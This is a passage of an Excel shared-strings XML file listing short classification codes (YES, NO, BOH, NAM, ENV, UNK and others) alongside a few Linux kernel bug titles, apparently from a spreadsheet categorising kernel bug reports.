  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Freezes with kernel 2.6.25, worked perfectly with 2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Graphics hang and kernel backtrace when starting Azureus with Compiz enabled</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32 seemed to have broken nVidia MCP7A sata controller</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
